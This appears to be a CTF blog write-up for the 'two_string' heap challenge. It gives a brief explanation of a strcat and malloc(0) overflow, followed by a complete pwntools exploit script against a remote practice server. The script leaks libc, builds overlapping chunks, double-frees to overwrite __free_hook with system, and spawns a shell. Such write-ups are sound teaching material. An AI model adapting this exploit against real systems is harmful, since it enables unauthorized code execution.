ha1vk's blog
0%

中关村2019_two_string

发表于 分类于

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,合并的时候,使用的是strcat,但是total_size的计算,没有考虑如果原size为0的情况。

在add里面,我们可以申请size为0的堆。

根据堆的性质,malloc(0)和malloc(0x10)申请的是同一个大小的chunk,假设在fastbin里有多个chunk,malloc(0)取得的chunk其fd有一个指针,没有被清空,这样strcat就可以把这个指针追加进去,从而后面的堆的内容strcat后,就溢出了。那么就可以构造overlap chunk,然后进行常规的堆利用了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
#coding:utf8
from pwn import *

#sh = process('./two_string',env={'LD_PRELOAD':'./libc-2.27.so'})
#sh = process('./two_string')
sh = remote('node3.buuoj.cn',29489)
libc = ELF('./libc-2.27.so')
malloc_hook_s = libc.symbols['__malloc_hook']
free_hook_s = libc.symbols['__free_hook']

def add(size,content):
   sh.sendlineafter('>>>','1')
   sh.sendlineafter('string :',str(size))
   sh.sendafter('string :',content)

def show(index):
   sh.sendlineafter('>>>','2')
   sh.sendlineafter('index :',str(index))

def delete(index):
   sh.sendlineafter('>>>','3')
   sh.sendlineafter('index :',str(index))

def merge_strs(seq):
   sh.sendlineafter('>>>','5')
   sh.sendlineafter('merged :',seq)

add(0x10,'a'*0x10) #0
add(0xF0,'b'*0xF0) #1
add(0x20,'c'*0x20) #2
delete(0)
add(0x400,'b\n') #0
add(0xF0,'c'*0xF0) #3
add(0x3F8,'d'*0x3E2 + p64(0x410 + 0x70 + 0xC0) + p64(0x100) + '\n') #4

for i in range(5,12):
   add(0xF0,'e\n')

for i in range(5,12):
   delete(i)
#chunk1放入unsorted bin
delete(1)
add(0,'') #1
show(1)
sh.recvuntil('Notes are : ')
heap_addr = u64(sh.recv(6).ljust(8,'\x00'))
print 'heap_addr=',hex(heap_addr)
for i in range(5,8):
   add(0x10,'\n')
add(0,'') #8
show(8)
sh.recvuntil('Notes are : ')
main_arena_xx = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
system_addr = libc_base + libc.sym['system']
print 'libc_base=',hex(libc_base)
print 'free_hook_addr=',hex(free_hook_addr)
print 'system_addr=',hex(system_addr)
delete(0)
merge_strs('1 1 1 1 1 1 4') #0使得chunk3的size低1字节为0
#清空prev_size
for i in range(7,-1,-1):
   delete(4)
   add(0x3F8,'d'*0x3E2 + 'd'*i + '\n') #4
   delete(0)
   merge_strs('1 1 1 1 1 4') #0
#布置prev_size
delete(4)
add(0x3F8,'d'*0x3E2 + p64(0x540) + '\n') #4
delete(0)
merge_strs('1 1 1 1 1 4') #0
delete(3) #形成overlap chunk
add(0xD0,'/bin/sh\n') #3
add(0x60,'b'*0x20 + '\n') #9

#double free
delete(2)
delete(9)
add(0x60,p64(free_hook_addr) + '\n') #2
add(0x60,'a\n')
add(0x60,p64(system_addr) + '\n')
#getshell
delete(3)


sh.interactive()